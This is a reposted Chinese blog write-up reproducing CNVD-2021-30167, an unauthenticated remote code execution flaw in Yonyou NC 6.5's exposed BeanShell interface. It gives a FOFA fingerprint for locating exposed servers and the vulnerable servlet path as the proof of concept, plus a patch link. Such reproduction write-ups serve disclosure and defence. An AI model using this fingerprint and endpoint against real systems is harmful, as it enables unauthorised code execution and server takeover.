文章总结: 本文介绍了用友NCBeanShell远程代码执行漏洞CNVD-2021-30167的复现方法。该漏洞影响NC6.5版本,由于系统对外开放了BeanShell接口,攻击者可未授权访问并执行任意代码获取服务器权限。文章提供了漏洞原理、FOFA搜索语句、复现步骤及官方修复补丁链接,建议用户及时安装补丁以防范风险。
综合评分: 86
文章分类: 漏洞分析,渗透测试,WEB安全,漏洞预警,应急响应
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
原创
SuPejkj
渗透Xiao白帽
2021年6月4日 10:20
0x01 简介
该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。
0x02 影响版本
NC6.5版本
0x03 漏洞复现
FOFA语句:
icon_hash="1085941792"
访问目标站点这个酱紫
执行命令
PoC:
/servlet/~ic/bsh.servlet.BshServlet
脚本验证
用脚写的太菜就不放出来见笑了
0x04 修复方案
官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。下载链接:http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:渗透Xiao白帽 SuPejkj《【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现》